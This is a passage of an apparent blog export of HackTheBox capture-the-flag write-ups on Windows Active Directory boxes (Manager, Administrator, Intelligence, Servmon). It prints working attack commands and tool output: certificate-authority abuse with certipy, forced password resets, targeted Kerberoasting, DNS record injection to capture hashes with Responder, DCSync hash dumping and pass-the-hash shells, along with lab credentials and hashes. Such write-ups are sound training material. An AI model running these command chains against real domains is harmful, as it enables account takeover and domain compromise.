If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : ...[snip]... Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-05T21:17:25 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 10m44s, deviation: 1s, median: 10m45s TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 104.29 ms 10.10.14.1 2 104.78 ms manager.htb (10.129.16.174) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 121.13 seconds Dirbusting # Shares # I validated this step using the evidence below before moving forward in the chain.\nWe have guest access for now, which gives us this list of users\nlets validate these users\nRoasting # lets see if there are any roastables\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nwe got 1 user john due\nExploitation # well, there is no way I could have figured this out without looking at the writeup. 
there is a user with the same username as their password, operator:operator\nthese creds seem to work with the mssql server so lets check that out\nwe in boy\nI remember I was able to grab the hash in the Escape box using mssql, so lets try that\nand boom\nDC01$::MANAGER:07489e9bc0d737fd lets crack it with hashcat\nok I don't think that's the intended path, cuz it's taking forever to crack\n0 wwwroot 1 0 SQL (MANAGER\\Operator guest@master)> xp_dirtree C:\\inetpub\\wwwroot subdirectory depth file ------------------------------- ----- ---- about.html 1 1 contact.html 1 1 css 1 0 images 1 0 index.html 1 1 js 1 0 service.html 1 1 web.config 1 1 website-backup-27-07-23-old.zip 1 1 SQL (MANAGER\\Operator guest@master)> xp_dirtree C:\\inetpub\\wwwroot there is an interesting file here, the website backup, lets grab it\nwget http://manager.htb/website-backup-27-07-23-old.zip we find this in the old.conf file\n<ldap-conf>\n <server>\n <host>dc01.manager.htb</host>\n <open-port enabled=\"true\">389</open-port>\n <secure-port enabled=\"false\">0</secure-port>\n <search-base>dc=manager,dc=htb</search-base>\n <server-type>microsoft</server-type>\n <access-user>\n <user>raven@manager.htb</user>\n <password>R4v3nBe5tD3veloP3r!123</password>\n </access-user>\n <uid-attribute>cn</uid-attribute>\n </server>\n <search type=\"full\">\n </search>\n</ldap-conf>\nraven's creds, raven:R4v3nBe5tD3veloP3r!123\nshell as raven # lets check for certificates 
with certipy\nhmm lets check on esc7\nESC 7 # (kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad ca \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -add-officer \u0026#39;raven\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Successfully added officer \u0026#39;Raven\u0026#39; on \u0026#39;manager-DC01-CA\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad ca \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -enable-template \u0026#39;SubCA\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Successfully enabled \u0026#39;SubCA\u0026#39; on \u0026#39;manager-DC01-CA\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad req \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -template \u0026#39;SubCA\u0026#39; -upn \u0026#39;administrator@manager.htb\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 20 [-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate. Would you like to save the private key? 
(y/N): y [*] Saving private key to \u0026#39;20.key\u0026#39; [*] Wrote private key to \u0026#39;20.key\u0026#39; [-] Failed to request certificate ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad ca \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -issue-request \u0026#39;20\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Successfully issued certificate request ID 20 ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad req \\ -u \u0026#39;raven@manager.htb\u0026#39; -p \u0026#39;R4v3nBe5tD3veloP3r!123\u0026#39; \\ -ns \u0026#39;10.129.16.174\u0026#39; -target \u0026#39;dc01.manager.htb\u0026#39; \\ -ca \u0026#39;manager-DC01-CA\u0026#39; -retrieve \u0026#39;20\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Retrieving certificate with ID 20 [*] Successfully retrieved certificate [*] Got certificate with UPN \u0026#39;administrator@manager.htb\u0026#39; [*] Certificate has no object SID [*] Loaded private key from \u0026#39;20.key\u0026#39; [*] Saving certificate and private key to \u0026#39;administrator.pfx\u0026#39; [*] Wrote certificate and private key to \u0026#39;administrator.pfx\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ sudo ntpdate manager.htb [sudo] password for kali: 2026-03-05 22:25:02.595217 (-0500) +2847.757318 +/- 0.052799 manager.htb 10.129.16.174 s1 no-leap CLOCK: time stepped by 2847.757318 ┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ certipy-ad auth -pfx \u0026#39;administrator.pfx\u0026#39; -dc-ip \u0026#39;10.129.16.174\u0026#39; Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: \u0026#39;administrator@manager.htb\u0026#39; [*] Using principal: \u0026#39;administrator@manager.htb\u0026#39; [*] Trying to get TGT... 
[*] Got TGT [*] Saving credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Wrote credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;administrator\u0026#39; [*] Got hash for \u0026#39;administrator@manager.htb\u0026#39;: aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef $ lets now authenticate\n┌──(kali㉿kali)-[~/Desktop/Boxes/manager] └─$ evil-winrm -i manager.htb -u administrator@manager.htb -H \u0026#39;ae5064c2f62317332c88629e025924ef\u0026#39; Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc\u0026#39; for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Administrator\\Documents\u0026gt; ","date":"5 March 2026","externalUrl":null,"permalink":"/ctf-writeups/manager/","section":"CTF Writeups","summary":"","title":"Manager","type":"ctf-writeups"},{"content":" Administrator # Overview # OS: Windows IP: 10.129.16.22 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got creds, abused genericwrite then forechange pass and then cracked psafe file got creds, used it to abuse dsync nd got admin.\nLoot # Loot Category Details Usernames Olivia michael Benjamin emily ethan | | Passwords | ichliebedich Password tekieromucho UXLCI5iETUsIBoFVTj8yQFKoHjXmb limpkizkit | | Usernames+Passwords | Olivia:ichliebedich michael:Password benjamin:Password emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb ethan:limpkizkit | | Hashes | | | Service Versions | |\nEnumeration # Nmap # $ nmap 10.129.16.22 -sCV -A -Pn -p- --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-04 22:47 EST Warning: 10.129.16.22 giving up on port because retransmission cap hit (10). 
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 64.00% done; ETC: 22:48 (0:00:29 remaining) Nmap scan report for 10.129.16.22 Host is up (0.099s latency). Not shown: 65457 closed tcp ports (reset), 53 filtered tcp ports (no-response) PORT STATE SERVICE VERSION **21/tcp open ftp Microsoft ftpd** | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus **88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-05 02:49:21Z) 135/tcp open msrpc Microsoft Windows RPC** 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped **5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)** |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing **47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0** |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49696/tcp open msrpc Microsoft Windows RPC 50789/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 50794/tcp open msrpc Microsoft Windows RPC 50801/tcp open msrpc Microsoft Windows RPC 50814/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
TCP/IP fingerprint: Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-05T02:50:38 |_ start_date: N/A |_clock-skew: -57m48s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required TRACEROUTE (using port 110/tcp) HOP RTT ADDRESS 1 99.86 ms 10.10.14.1 2 97.71 ms 10.129.16.22 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 91.91 seconds Dirbusting # Lets see what all we have access to with this user\nWe got more users\nlets check all of them for any cred reuse\nok so olivia seems to be the only legit cred then\nSMB # ┌──(kali㉿kali)-[~/Desktop/Boxes/Administrator] └─$ impacket-smbclient Olivia:ichliebedich@10.129.16.22 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies Type help for list of commands ## ls [-] No share selected ## shares ADMIN$ C$ IPC$ NETLOGON SYSVOL ## cd IPC$ [-] No share selected ## use IPC$ ## ls ...[snip]... ## cd .. ## shares ADMIN$ C$ IPC$ NETLOGON SYSVOL ## use NETLOGON ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 .. ## use SYSVOL ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 .. drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 administrator.htb ## cd administrator.htb ## ls drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 . drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 .. drw-rw-rw- 0 Wed Mar 4 21:49:38 2026 DfsrPrivate drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 Policies drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 scripts ## cd scripts ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 .. ## cd .. ## cd Policies ## ls drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 . drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 .. drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 {31B2F340-016D-11D2-945F-00C04FB984F9} drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 {6AC1786C-016F-11D2-945F-00C04fB984F9} ## cd .. ## cd DfsrPrivate [-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. 
## ls drw-rw-rw- 0 Fri Oct 4 15:54:15 2024 . drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 .. drw-rw-rw- 0 Wed Mar 4 21:49:38 2026 DfsrPrivate drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 Policies drw-rw-rw- 0 Fri Oct 4 15:49:22 2024 scripts Nothing great here\nRoasting # ┌──(kali㉿kali)-[~/Desktop/Boxes/Administrator] └─$ ./kerbrute userenum --dc 10.129.16.22 -d administrator.htb users.txt -v Version: v1.0.3 (9dad6e1) - 03/04/26 - Ronnie Flathers @ropnop 2026/03/04 23:09:47 > Using KDC(s): 2026/03/04 23:09:47 > 10.129.16.22:88 2026/03/04 23:09:47 > [+] VALID USERNAME: Administrator@administrator.htb 2026/03/04 23:09:47 > [!] krbtgt@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:47 > [!] Guest@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:47 > [!] emma@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:47 > [+] VALID USERNAME: emily@administrator.htb 2026/03/04 23:09:47 > [+] VALID USERNAME: ethan@administrator.htb 2026/03/04 23:09:47 > [+] VALID USERNAME: benjamin@administrator.htb 2026/03/04 23:09:47 > [+] VALID USERNAME: michael@administrator.htb 2026/03/04 23:09:47 > [!] alexander@administrator.htb - USER LOCKED OUT 2026/03/04 23:09:52 > [+] VALID USERNAME: Olivia@administrator.htb 2026/03/04 23:09:52 > Done! 
Tested 10 usernames (6 valid) in 5.271 seconds ┌──(kali㉿kali)-[~/Desktop/Boxes/Administrator] └─$ validated the users\nExploitation # after all those checks we can now begin with the winrm session\nno interesting privs\nPRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled we have GenericAll over michael\nMichael # lets go to michael\ncertipy-ad shadow auto -u krishna@ignite.local -p Password@1 -account management_svc certipy-ad shadow auto \\ -u Olivia@administrator.htb \\ -p 'ichliebedich' \\ -account michael \\ -dc-ip 10.129.16.22 \\ -target dc.administrator.htb Well, that does not seem to work, lets just use the abuse we see on BloodHound\nnet rpc password \"michael\" \"Password\" -U \"administrator.htb\"/\"Olivia\"%\"ichliebedich\" -S \"administrator.htb\" lets change his password\ngreat, we got access to michael, lets see if michael's got any outbound\nBenjamin # wow, we just gotta do the same thing now\nnet rpc password \"benjamin\" \"Password\" -U \"administrator.htb\"/\"michael\"%\"Password\" -S \"administrator.htb\" ok so for some reason benjamin does not have a winrm shell, BUT he has ftp\nlets grab this file\nlets use pwsafe\nahh lets check the shares as benjamin\nnothing interesting on the shares\nhmm lets try cracking the file\nnow we can\ntoo much time, lets just use hashcat instead\nlets use 5200\ntekieromucho lets use this cred to open the database\nso we have these users; out of these, only emily is a valid user\nso lets check her file\nthese are the creds we have\nfor emily 
we have\nemily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb now lets spray against emily\nwe now have a winrm session as emily\nEmily # we have GenericWrite over ethan\nlets try the targeted kerberoast\nTargeted Kerberoast # source venv/bin/activate uv add --script targetedKerberoast.py -r requirements.txt sudo ntpdate administrator.htb uv run targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb or **python targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb** lets crack it\nhashcat ethan.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.tx and we get\nlimpkizkit as the password for ethan\nAdministrator # so apparently ethan has DCSync over the administrator.htb domain\nlets dump hashes for the domain with secretsdump\nsecretsdump.py ethan:limpbizkit@dc.administrator.htb lets pth and grab our files\nevil-winrm -i dc.administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e ","date":"4 March 2026","externalUrl":null,"permalink":"/ctf-writeups/administrator/","section":"CTF Writeups","summary":"","title":"Administrator","type":"ctf-writeups"},{"content":" Intelligence # Overview # OS: Windows IP: 10.129.95.154 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got initial access through default creds found by enumerating PDF files; once in, added our DNS record, captured a hash with Responder and then passed the hash to grab the password of a service account; used the service account to grab the admin hash because it had AllowedToDelegate over a machine.\nLoot # | Loot Category | Details |\n| --- | --- |\n| Usernames | Ted.Graves |\n| Passwords | NewIntelligenceCorpUser9876, Mr.Teddy |\n| Usernames+Passwords | Tiffany.Molina:NewIntelligenceCorpUser9876 Ted.Graves:MrTeddy |\n| Hashes | |\n| Service Versions | |\nEnumeration # Nmap # └─$ nmap -sU --min-rate=20000 10.129.95.154 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-03 15:36 EST Nmap scan report for 10.129.95.154 Host is up (0.12s latency). 
Not shown: 996 open|filtered udp ports (no-response) PORT STATE SERVICE 53/udp open domain **88/udp open kerberos-sec** 123/udp open ntp **389/udp open ldap** Nmap done: 1 IP address (1 host up) scanned in 1.17 second Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-03 15:35 EST Nmap scan report for 10.129.95.154 Host is up (0.35s latency). Not shown: 65517 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus **80/tcp open http Microsoft IIS httpd 10.0** | http-methods: |_ Potentially risky methods: TRACE **|_http-title: Intelligence** |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-04 03:36:00Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn **389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)** |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. **| ssl-cert: Subject: commonName=dc.intelligence.htb** | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. 
| ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49692/tcp open msrpc Microsoft Windows RPC 49711/tcp open msrpc Microsoft Windows RPC 49717/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-04T03:37:05 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 686.57 ms 10.10.14.1 2 686.72 ms 10.129.95.154 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 116.64 seconds Hosts # Lets add it to our hosts file first\nDirbusting # SMB # Port 80 # Exploitation # so there is a place where we can see the documents\nI'm gonna try and see if anything reveals a sensitive one\nlets generate dates with this python file\nimport datetime\n\nstart = datetime.date(2020, 1, 1)\ntimelapse = 1080  # 1080 days starting 2020-01-01 (last date generated is 2022-12-15)\ndates = []\nfor day in range(timelapse):\n    d = (start + datetime.timedelta(days=day)).isoformat()\n    dates.append(d)\n\nwith open(\"dates.txt\", \"w\") as f:\n    for d in dates:\n        f.write(d + '\\n')\nprint(\"Dates successfully generated !\")\nlets use ffuf now to enumerate the right responses\nffuf -ic -c -w dates.txt -u http://intelligence.htb/documents/FUZZ-upload.pdf -mc all -fc 404 great, now lets download them and run exiftool\n└─$ awk '{ print $1 }' dates.txt > vdates.txt great now lets\nfor d in $(cat vdates.txt); do curl -s -O \"http://intelligence.htb/documents/$d-upload.pdf\"; done lets convert them into text and check for anything interesting\nfor pdf_file in $(ls); do pdftotext $pdf_file; done now lets grab anything interesting\nnice so we have a default password NewIntelligenceCorpUser9876\nlets grab the usernames with exiftool\nexiftool *.pdf | grep Creator | awk -F': ' '{ print $2 }' we should be able to now spray the password against these\nWilliam.Lee Scott.Scott Jason.Wright Veronica.Patel Jennifer.Thomas Danny.Matthews David.Reed Stephanie.Young Daniel.Shelton Jose.Williams John.Coleman Jason.Wright Jose.Williams Daniel.Shelton Brian.Morris Jennifer.Thomas Thomas.Valenzuela Travis.Evans Samuel.Richardson Richard.Williams David.Mcbride Jose.Williams John.Coleman William.Lee Anita.Roberts Brian.Baker Jose.Williams David.Mcbride Kelly.Long John.Coleman Jose.Williams Nicole.Brock Thomas.Valenzuela David.Reed Kaitlyn.Zimmerman 
Jason.Patterson Thomas.Valenzuela David.Mcbride Darryl.Harris William.Lee Stephanie.Young David.Reed Nicole.Brock David.Mcbride William.Lee Stephanie.Young John.Coleman David.Wilson Scott.Scott Teresa.Williamson John.Coleman Veronica.Patel John.Coleman Samuel.Richardson Ian.Duncan Nicole.Brock William.Lee Jason.Wright Travis.Evans David.Mcbride Jessica.Moody Ian.Duncan Jason.Wright Richard.Williams Tiffany.Molina Jose.Williams Jessica.Moody Brian.Baker Anita.Roberts Teresa.Williamson Kaitlyn.Zimmerman Jose.Williams Stephanie.Young Samuel.Richardson Tiffany.Molina Ian.Duncan Kelly.Long Travis.Evans Ian.Duncan Jose.Williams David.Wilson Thomas.Hall Ian.Duncan Jason.Patterson Stephanie.Young Kaitlyn.Zimmerman Travis.Evans Kelly.Long Danny.Matthews Travis.Evans Jessica.Moody Thomas.Valenzuela Anita.Roberts Stephanie.Young David.Reed Jose.Williams Veronica.Patel Ian.Duncan Richard.Williams Great, we got our first pair of creds: Tiffany.Molina:NewIntelligenceCorpUser9876\nlet's also try AS-REP roasting and kerberoasting\nRoasting # No entries, so let's move on to enumerating the shares first\nSMB # We can read some shares, let's check them out\nthere is another user we discover here\nsmb: \\\u0026gt; dir . DR 0 Sun Apr 18 21:20:26 2021 .. DR 0 Sun Apr 18 21:20:26 2021 Administrator D 0 Sun Apr 18 20:18:39 2021 All Users DHSrn 0 Sat Sep 15 03:21:46 2018 Default DHR 0 Sun Apr 18 22:17:40 2021 Default User DHSrn 0 Sat Sep 15 03:21:46 2018 desktop.ini AHS 174 Sat Sep 15 03:11:27 2018 Public DR 0 Sun Apr 18 20:18:39 2021 Ted.Graves D 0 Sun Apr 18 21:20:26 2021 Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021 3770367 blocks of size 4096. 1401864 blocks available Found this file\nTry \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; dir . D 0 Sun Apr 18 20:50:55 2021 .. D 0 Sun Apr 18 20:50:55 2021 downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021 3770367 blocks of size 4096. 
1401864 blocks available smb: \\\u0026gt; get downdetector.ps1 getting file \\downdetector.ps1 of size 1046 as downdetector.ps1 (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec) smb: \\\u0026gt; Let's see what it's about\n─$ cat downdetector.ps1 # Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem \u0026#34;AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; | Where-Object Name -like \u0026#34;web*\u0026#34;) { try { $request = Invoke-WebRequest -Uri \u0026#34;http://$($record.Name)\u0026#34; -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -To \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -Subject \u0026#34;Host: $($record.Name) is down\u0026#34; } } catch {} } another mention of Ted.Graves\nhe is not roastable\nhmm, let's grab everything with BloodHound\ncouldn't find anything useful, so I started looking at the DNS records because of that file we found\nLateral Movement On the IT share we find a script called downdetector.ps1 : We review the source code: The script loops through DNS records and sends an authenticated request (-UseDefaultCredentials) to any host having a name starting with web in order to check its status. We can leverage the permission (granted by default to authenticated users) to create arbitrary DNS records on the Active Directory Integrated DNS (ADIDNS) zone to add a new record that points to our own IP address. 
This can be accomplished using the dnstool.py script from krbrelayx\nhad to look this up; let's try it\ndnstool.py -u \u0026#39;intelligence\\Tiffany.Molina\u0026#39; -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web1 -d 10.10.14.137 -t A Now let's get Responder running and see if we can intercept the request\nresponder -I tun0 -A and boom, we have our hash\nAnalyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details. [+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned. [HTTP] NTLMv2 Client : 10.129.95.154 [HTTP] NTLMv2 Username : intelligence\\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:8633d8e35352f77a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on cracking it with john we get\n**Mr.Teddy** Shell As Administrator # now let's see\nhmm, I think we can try getting the gMSA service account and then escalating to admin\nlet's just use that\n$ python gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.129.95.154 Users or groups who can read password for svc_int$: \u0026gt; DC$ \u0026gt; itsupport svc_int$:::d5538dca5ba2ff329c9df39ef130f439 svc_int$:aes256-cts-hmac-sha1-96:8895ba258759c7fa94d7e7acd256f1d47dffe6783129f8f3785ba1634379c39e svc_int$:aes128-cts-hmac-sha1-96:1ebe879f3ecb1169f32413d9a8ebc7a6 impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :d5538dca5ba2ff329c9df39ef130f439 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... 
[*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache now we can use it with wimi\nexport KRB5CCNAME=Administrator.ccache ┌──(kali㉿kali)-[~/Desktop/Tools/ACTIVEDIRECTORY] └─$ impacket-wmiexec -k -no-pass dc.intelligence.htb ","date":"4 March 2026","externalUrl":null,"permalink":"/ctf-writeups/intelligence/","section":"CTF Writeups","summary":"","title":"Intelligence","type":"ctf-writeups"},{"content":" Servmon # Overview # OS: Windows IP: 10.129.95.122 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got initial access via path traversal and then port forwarded w ssh, api broken cant get root.txt.\nLoot # Loot Category Details Usernames Nadine, Nathan Passwords 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5!\nB3WithM30r4ga1n5tMe\nL1k3B1gBut7s@W0rk\n0nly7h3y0unGWi11F0l10w\nIfH3s4b0Utg0t0H1sH0me\nGr4etN3w5w17hMySk1Pa5$\new2x6SsGTxjRwXOT | | Usernames+Passwords | Nadine:L1k3B1gBut7s@W0rk | | Hashes | | | Service Versions | 